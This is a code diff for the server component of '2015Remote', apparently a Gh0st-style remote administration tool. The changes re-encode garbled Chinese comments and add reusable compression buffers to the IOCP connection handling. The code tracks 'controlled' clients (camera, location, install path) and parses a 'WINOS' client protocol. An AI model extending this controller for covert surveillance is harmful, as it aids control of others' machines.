SendCompressBuffer 由 CONTEXT_OBJECT 管理,不在此处释放 } while (false); return TRUE; @@ -579,9 +579,9 @@ BOOL IOCPServer::OnClientPreSending(CONTEXT_OBJECT* ContextObject, PBYTE szBuffe if (WriteContextData(ContextObject, szBuffer, ulOriginalLength)) { OVERLAPPEDPLUS* OverlappedPlus = new OVERLAPPEDPLUS(IOWrite); BOOL bOk = PostQueuedCompletionStatus(m_hCompletionPort, 0, (ULONG_PTR)ContextObject, &OverlappedPlus->m_ol); - if ( (!bOk && GetLastError() != ERROR_IO_PENDING) ) { //Ͷʧ + if ( (!bOk && GetLastError() != ERROR_IO_PENDING) ) { //如果投递失败 int a = GetLastError(); - Mprintf("!!! OnClientPreSending ͶϢʧ\n"); + Mprintf("!!! OnClientPreSending 投递消息失败\n"); RemoveStaleContext(ContextObject); SAFE_DELETE(OverlappedPlus); return FALSE; @@ -597,12 +597,12 @@ BOOL IOCPServer::OnClientPostSending(CONTEXT_OBJECT* ContextObject,ULONG ulCompl try { DWORD ulFlags = MSG_PARTIAL; - ContextObject->OutCompressedBuffer.RemoveCompletedBuffer(ulCompletedLength); //ɵݴݽṹȥ + ContextObject->OutCompressedBuffer.RemoveCompletedBuffer(ulCompletedLength); //将完成的数据从数据结构中去除 if (ContextObject->OutCompressedBuffer.GetBufferLength() == 0) { ContextObject->OutCompressedBuffer.ClearBuffer(); - return true; //ߵ˵ǵȫ + return true; //走到这里说明我们的数据真正完全发送 } else { - OVERLAPPEDPLUS * OverlappedPlus = new OVERLAPPEDPLUS(IOWrite); //û ǼͶ + OVERLAPPEDPLUS * OverlappedPlus = new OVERLAPPEDPLUS(IOWrite); //数据没有完成 我们继续投递 发送请求 ContextObject->wsaOutBuffer.buf = (char*)ContextObject->OutCompressedBuffer.GetBuffer(0); ContextObject->wsaOutBuffer.len = ContextObject->OutCompressedBuffer.GetBufferLength(); @@ -610,7 +610,7 @@ BOOL IOCPServer::OnClientPostSending(CONTEXT_OBJECT* ContextObject,ULONG ulCompl NULL, ulFlags,&OverlappedPlus->m_ol, NULL); if ( iOk == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING ) { int a = GetLastError(); - Mprintf("!!! OnClientPostSending ͶϢʧ: %d\n", a); + Mprintf("!!! OnClientPostSending 投递消息失败: %d\n", a); RemoveStaleContext(ContextObject); SAFE_DELETE(OverlappedPlus); return FALSE; @@ -624,7 +624,7 @@ BOOL IOCPServer::OnClientPostSending(CONTEXT_OBJECT* ContextObject,ULONG ulCompl return FALSE; } -DWORD IOCPServer::ListenThreadProc(LPVOID lParam) //߳ +DWORD IOCPServer::ListenThreadProc(LPVOID lParam) //监听线程 { IOCPServer* This = (IOCPServer*)(lParam); WSANETWORKEVENTS NetWorkEvents; @@ -639,7 +639,7 @@ DWORD IOCPServer::ListenThreadProc(LPVOID lParam) // continue; int iRet = WSAEnumNetworkEvents(This->m_sListenSocket, - //¼ Ǿͽ¼תһ¼ ж + //如果事件授信 我们就将该事件转换成一个网络事件 进行 判断 This->m_hListenEvent, &NetWorkEvents); @@ -666,12 +666,12 @@ void IOCPServer::OnAccept() int iLen = sizeof(SOCKADDR_IN); sClientSocket = accept(m_sListenSocket, (sockaddr*)&ClientAddr, - &iLen); //ͨǵļ׽һ֮źͨŵ׽ + &iLen); //通过我们的监听套接字来生成一个与之信号通信的套接字 if (sClientSocket == SOCKET_ERROR) { return; } - //Ϊÿһźάһ֮ݽṹΪû± + //我们在这里为每一个到达的信号维护了一个与之关联的数据结构这里简称为用户的上下背景文 PCONTEXT_OBJECT ContextObject = AllocateContext(sClientSocket); // Context if (ContextObject == NULL) { @@ -699,34 +699,34 @@ void IOCPServer::OnAccept() return; } - //׽ֵѡ Set KeepAlive SO_KEEPALIVE - //ӼԷǷ2Сʱڴ׽ӿڵһû - //ݽTCPԶԷ һִ + //设置套接字的选项卡 Set KeepAlive 开启保活机制 SO_KEEPALIVE + //保持连接检测对方主机是否崩溃如果2小时内在此套接口的任一方向都没 + //有数据交换,TCP就自动给对方 发一个保持存活 m_ulKeepLiveTime = 3; const BOOL bKeepAlive = TRUE; setsockopt(ContextObject->sClientSocket,SOL_SOCKET,SO_KEEPALIVE,(char*)&bKeepAlive,sizeof(bKeepAlive)); - //óʱϸϢ + //设置超时详细信息 tcp_keepalive KeepAlive; - KeepAlive.onoff = 1; // ñ - KeepAlive.keepalivetime = m_ulKeepLiveTime; //3ûݣͷ̽ - KeepAlive.keepaliveinterval = 1000 * 10; //ԼΪ10 Resend if No-Reply + KeepAlive.onoff = 1; // 启用保活 + KeepAlive.keepalivetime = m_ulKeepLiveTime; //超过3分钟没有数据,就发送探测包 + KeepAlive.keepaliveinterval = 1000 * 10; //重试间隔为10秒 Resend if No-Reply WSAIoctl(ContextObject->sClientSocket, SIO_KEEPALIVE_VALS,&KeepAlive,sizeof(KeepAlive), NULL,0,(unsigned long *)&bKeepAlive,0,NULL); - //ʱͻ߻ϵȷϿûSO_KEEPALIVEѡ - //һֱرSOCKETΪϵĵĬСʱʱ̫Ǿֵ + //在做服务器时,如果发生客户端网线或断电等非正常断开的现象,如果服务器没有设置SO_KEEPALIVE选项, + //则会一直不关闭SOCKET。因为上的的设置是默认两个小时时间太长了所以我们就修正这个值 EnterCriticalSection(&m_cs); - m_ContextConnectionList.AddTail(ContextObject); //뵽ǵڴб + m_ContextConnectionList.AddTail(ContextObject); //插入到我们的内存列表中 LeaveCriticalSection(&m_cs); - OVERLAPPEDPLUS *OverlappedPlus = new OVERLAPPEDPLUS(IOInitialize); //עصIO û + OVERLAPPEDPLUS *OverlappedPlus = new OVERLAPPEDPLUS(IOInitialize); //注意这里的重叠IO请求是 用户请求上线 - BOOL bOk = PostQueuedCompletionStatus(m_hCompletionPort, 0, (ULONG_PTR)ContextObject, &OverlappedPlus->m_ol); // ߳ - //ΪǽܵһûߵôǾͽ͸ǵɶ˿ ǵĹ̴߳ - if ( (!bOk && GetLastError() != ERROR_IO_PENDING)) { //Ͷʧ + BOOL bOk = PostQueuedCompletionStatus(m_hCompletionPort, 0, (ULONG_PTR)ContextObject, &OverlappedPlus->m_ol); // 工作线程 + //因为我们接受到了一个用户上线的请求那么我们就将该请求发送给我们的完成端口 让我们的工作线程处理它 + if ( (!bOk && GetLastError() != ERROR_IO_PENDING)) { //如果投递失败 int a = GetLastError(); - Mprintf("!!! OnAccept ͶϢʧ\n"); + Mprintf("!!! OnAccept 投递消息失败\n"); RemoveStaleContext(ContextObject); SAFE_DELETE(OverlappedPlus); return; @@ -737,9 +737,9 @@ void IOCPServer::OnAccept() VOID IOCPServer::PostRecv(CONTEXT_OBJECT* ContextObject) { - //ǵĸߵûͶһݵ - // ûĵһݰҲ;DZض˵ĵ½󵽴ǵĹ߳̾ - // Ӧ,ProcessIOMessage + //向我们的刚上线的用户的投递一个接受数据的请求 + // 如果用户的第一个数据包到达也就就是被控端的登陆请求到达我们的工作线程就 + // 会响应,并调用ProcessIOMessage函数 OVERLAPPEDPLUS * OverlappedPlus = new OVERLAPPEDPLUS(IORead); ContextObject->olps = OverlappedPlus; @@ -750,7 +750,7 @@ VOID IOCPServer::PostRecv(CONTEXT_OBJECT* ContextObject) if (iOk == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING) { int a = GetLastError(); - Mprintf("!!! PostRecv ͶϢʧ\n"); + Mprintf("!!! PostRecv 投递消息失败\n"); RemoveStaleContext(ContextObject); SAFE_DELETE(OverlappedPlus); } @@ -780,18 +780,18 @@ VOID IOCPServer::RemoveStaleContext(CONTEXT_OBJECT* ContextObject) EnterCriticalSection(&m_cs); auto find = m_ContextConnectionList.Find(ContextObject); LeaveCriticalSection(&m_cs); - if (find) { //ڴвҸûݽṹ + if (find) { //在内存中查找该用户的上下文数据结构 m_OfflineProc(ContextObject); - CancelIo((HANDLE)ContextObject->sClientSocket); //ȡڵǰ׽ֵ첽IO -->PostRecv - closesocket(ContextObject->sClientSocket); //ر׽ + CancelIo((HANDLE)ContextObject->sClientSocket); //取消在当前套接字的异步IO -->PostRecv + closesocket(ContextObject->sClientSocket); //关闭套接字 ContextObject->sClientSocket = INVALID_SOCKET; - while (!HasOverlappedIoCompleted((LPOVERLAPPED)ContextObject)) { //жϻû첽IOڵǰ׽ + while (!HasOverlappedIoCompleted((LPOVERLAPPED)ContextObject)) { //判断还有没有异步IO请求在当前套接字上 Sleep(0); } - MoveContextToFreePoolList(ContextObject); //ڴṹڴ + MoveContextToFreePoolList(ContextObject); //将该内存结构回收至内存池 } } @@ -806,8 +806,8 @@ VOID IOCPServer::MoveContextToFreePoolList(CONTEXT_OBJECT* ContextObject) ContextObject->OutCompressedBuffer.ClearBuffer(); memset(ContextObject->szBuffer,0,8192); - m_ContextFreePoolList.AddTail(ContextObject); //ڴ - m_ContextConnectionList.RemoveAt(Pos); //ڴṹƳ + m_ContextFreePoolList.AddTail(ContextObject); //回收至内存池 + m_ContextConnectionList.RemoveAt(Pos); //从内存结构中移除 } } diff --git a/server/2015Remote/Server.h b/server/2015Remote/Server.h index e5f9ea0..3373710 100644 --- a/server/2015Remote/Server.h +++ b/server/2015Remote/Server.h @@ -1,4 +1,4 @@ -#pragma once +#pragma once #include "stdafx.h" #include "common/mask.h" @@ -17,26 +17,26 @@ std::string GetPeerName(SOCKET sock); std::string GetRemoteIP(SOCKET sock); enum { - ONLINELIST_IP = 0, // IP˳ - ONLINELIST_ADDR, // ַ - ONLINELIST_LOCATION, // λ - ONLINELIST_COMPUTER_NAME, // /ע - ONLINELIST_OS, // ϵͳ + ONLINELIST_IP = 0, // IP的列顺序 + ONLINELIST_ADDR, // 地址 + ONLINELIST_LOCATION, // 地理位置 + ONLINELIST_COMPUTER_NAME, // 计算机名/备注 + ONLINELIST_OS, // 操作系统 ONLINELIST_CPU, // CPU - ONLINELIST_VIDEO, // ͷ() - ONLINELIST_PING, // PING(Է) - ONLINELIST_VERSION, // 汾Ϣ - ONLINELIST_INSTALLTIME, // װʱ - ONLINELIST_LOGINTIME, //  - ONLINELIST_CLIENTTYPE, // ͻ - ONLINELIST_PATH, // ļ· + ONLINELIST_VIDEO, // 摄像头(有无) + ONLINELIST_PING, // PING(对方的网速) + ONLINELIST_VERSION, // 版本信息 + ONLINELIST_INSTALLTIME, // 安装时间 + ONLINELIST_LOGINTIME, // 活动窗口 + ONLINELIST_CLIENTTYPE, // 客户端类型 + ONLINELIST_PATH, // 文件路径 ONLINELIST_MAX, }; enum { PARSER_WINOS = -2, - PARSER_FAILED = -1, // ʧ - PARSER_NEEDMORE = 0, // Ҫ + PARSER_FAILED = -1, // 解析失败 + PARSER_NEEDMORE = 0, // 需要更多数据 }; typedef struct PR { @@ -56,10 +56,10 @@ typedef struct PR { } PR; enum { - COMPRESS_UNKNOWN = -2, // δ֪ѹ㷨 - COMPRESS_ZLIB = -1, // ǰ汾ʹõѹ - COMPRESS_ZSTD = 0, // ǰʹõѹ - COMPRESS_NONE = 1, // ûѹ + COMPRESS_UNKNOWN = -2, // 未知压缩算法 + COMPRESS_ZLIB = -1, // 以前版本使用的压缩方法 + COMPRESS_ZSTD = 0, // 当前使用的压缩方法 + COMPRESS_NONE = 1, // 没有压缩 }; // Header parser: parse the data to make sure it's from a supported client. @@ -121,7 +121,7 @@ protected: HeaderEncType encTyp = HeaderEncUnknown; FlagType flagType = CheckHead(szPacketFlag, encTyp); if (flagType == FLAG_UNKNOWN) { - // ݳ + ͨ [4ֽʱ+40ֽ+ʶ+ϵͳλʶ] + // 数据长度 + 通信密码 [4字节启动时间+4个0字节+命令标识+系统位数标识] const BYTE* ptr = (BYTE*)buf.GetBuffer(0), * p = ptr + 4; int length = *((int*)ptr); int excepted = buf.GetBufferLength(); @@ -129,7 +129,7 @@ protected: p[6] == 0 && p[7] == 0 && p[8] == 202 && (p[9] == 0 || p[9] == 1)) { m_nFlagType = FLAG_WINOS; compressMethod = COMPRESS_NONE; - memcpy(m_szPacketFlag, p, 10); // ͨ + memcpy(m_szPacketFlag, p, 10); // 通信密码 m_nCompareLen = 0; m_nFlagLen = 0; m_nHeaderLen = 14; @@ -240,14 +240,14 @@ protected: return m_Encoder2; } private: - BOOL m_bParsed; // ݰǷԽ - int m_nHeaderLen; // ݰͷ - int m_nCompareLen; // ȶֽ - int m_nFlagLen; // ʶ - FlagType m_nFlagType; // ʶ - char m_szPacketFlag[32]; // ԱϢ - Encoder* m_Encoder; // - Encoder* m_Encoder2; // 2 + BOOL m_bParsed; // 数据包是否可以解析 + int m_nHeaderLen; // 数据包的头长度 + int m_nCompareLen; // 比对字节数 + int m_nFlagLen; // 标识长度 + FlagType m_nFlagType; // 标识类型 + char m_szPacketFlag[32]; // 对比信息 + Encoder* m_Encoder; // 编码器 + Encoder* m_Encoder2; // 编码器2 PkgMask* m_Masker; }; @@ -315,7 +315,7 @@ public: class context { public: - // 麯 + // 纯虚函数 virtual VOID InitMember(SOCKET s, Server* svr)=0; virtual BOOL Send2Client(PBYTE szBuffer, ULONG ulOriginalLength) = 0; virtual CString GetClientData(int index)const = 0; @@ -342,6 +342,9 @@ public: } }; +// 预分配解压缩缓冲区大小 +#define PREALLOC_DECOMPRESS_SIZE (4 * 1024) + typedef class CONTEXT_OBJECT : public context { public: @@ -351,6 +354,9 @@ public: ikcp_release(kcp); kcp = nullptr; } + FreeDecompressBuffer(); + FreeCompressBuffer(); + FreeSendCompressBuffer(); } CString sClientInfo[ONLINELIST_MAX]; CString additonalInfo[RES_MAX]; @@ -358,24 +364,95 @@ public: WSABUF wsaInBuf; WSABUF wsaOutBuffer; char szBuffer[PACKET_LENGTH]; - CBuffer InCompressedBuffer; // յѹ - CBuffer InDeCompressedBuffer; // ѹ + CBuffer InCompressedBuffer; // 接收到的压缩的数据 + CBuffer InDeCompressedBuffer; // 解压后的数据 CBuffer OutCompressedBuffer; HWND hWnd; HANDLE hDlg; OVERLAPPEDPLUS* olps; // OVERLAPPEDPLUS - int CompressMethod; // ѹ㷨 - HeaderParser Parser; // Э - uint64_t ID; // Ψһʶ + int CompressMethod; // 压缩算法 + HeaderParser Parser; // 解析数据协议 + uint64_t ID; // 唯一标识 - BOOL m_bProxyConnected; // Ƿ - BOOL bLogin; // Ƿ login - std::string PeerName; // ԶIP - Server* server; // - ikcpcb* kcp = nullptr; // ָKCPỰ - std::string GroupName; // + BOOL m_bProxyConnected; // 代理是否连接 + BOOL bLogin; // 是否 login + std::string PeerName; // 对端IP + Server* server; // 所属服务端 + ikcpcb* kcp = nullptr; // 新增,指向KCP会话 + std::string GroupName; // 分组名称 CLock SendLock; // fix #214 + // 预分配的解压缩缓冲区,避免频繁内存分配 + PBYTE DecompressBuffer = nullptr; + ULONG DecompressBufferSize = 0; + // 预分配的压缩数据缓冲区(接收时解压前) + PBYTE CompressBuffer = nullptr; + ULONG CompressBufferSize = 0; + // 预分配的发送压缩缓冲区(发送时压缩后) + PBYTE SendCompressBuffer = nullptr; + ULONG SendCompressBufferSize = 0; + + // 获取或分配解压缩缓冲区 + PBYTE GetDecompressBuffer(ULONG requiredSize) + { + if (DecompressBuffer == nullptr || DecompressBufferSize < requiredSize) { + FreeDecompressBuffer(); + // 分配时预留一些余量,减少重新分配次数 + DecompressBufferSize = max(requiredSize, PREALLOC_DECOMPRESS_SIZE); + DecompressBuffer = new BYTE[DecompressBufferSize]; + } + return DecompressBuffer; + } + + void FreeDecompressBuffer() + { + if (DecompressBuffer) { + delete[] DecompressBuffer; + DecompressBuffer = nullptr; + DecompressBufferSize = 0; + } + } + + // 获取或分配压缩数据缓冲区(用于接收时存放解压前的数据) + PBYTE GetCompressBuffer(ULONG requiredSize) + { + if (CompressBuffer == nullptr || CompressBufferSize < requiredSize) { + FreeCompressBuffer(); + CompressBufferSize = max(requiredSize, PREALLOC_DECOMPRESS_SIZE); + CompressBuffer = new BYTE[CompressBufferSize]; + } + return CompressBuffer; + } + + void FreeCompressBuffer() + { + if (CompressBuffer) { + delete[] CompressBuffer; + CompressBuffer = nullptr; + CompressBufferSize = 0; + } + } + + // 获取或分配发送用压缩缓冲区(用于发送时存放压缩后的数据) + PBYTE GetSendCompressBuffer(ULONG requiredSize) + { + if (SendCompressBuffer == nullptr || SendCompressBufferSize < requiredSize) { + FreeSendCompressBuffer(); + SendCompressBufferSize = max(requiredSize, PREALLOC_DECOMPRESS_SIZE); + SendCompressBuffer = new BYTE[SendCompressBufferSize]; + } + return SendCompressBuffer; + } + + void FreeSendCompressBuffer() + { + if (SendCompressBuffer) { + delete[] SendCompressBuffer; + SendCompressBuffer = nullptr; + SendCompressBufferSize = 0; + } + } + std::string GetProtocol() const override { return Parser.m_Masker && Parser.m_Masker->GetMaskType() == MaskTypeNone ? "TCP" : "HTTP"; @@ -516,7 +593,7 @@ public: SAFE_DELETE_ARRAY(szBuffer); } } - // Read compressed buffer. + // Read compressed buffer. 使用预分配缓冲区,避免频繁内存分配 PBYTE ReadBuffer(ULONG& dataLen, ULONG& originLen) { if (Parser.IsParsed()) { @@ -530,7 +607,8 @@ public: InCompressedBuffer.ReadBuffer((PBYTE)&originLen, sizeof(ULONG)); } dataLen = totalLen - Parser.GetHeaderLen(); - PBYTE CompressedBuffer = new BYTE[dataLen]; + // 使用预分配缓冲区替代每次 new + PBYTE CompressedBuffer = GetCompressBuffer(dataLen); InCompressedBuffer.ReadBuffer(CompressedBuffer, dataLen); Decode2(CompressedBuffer, dataLen, szPacketFlag); return CompressedBuffer;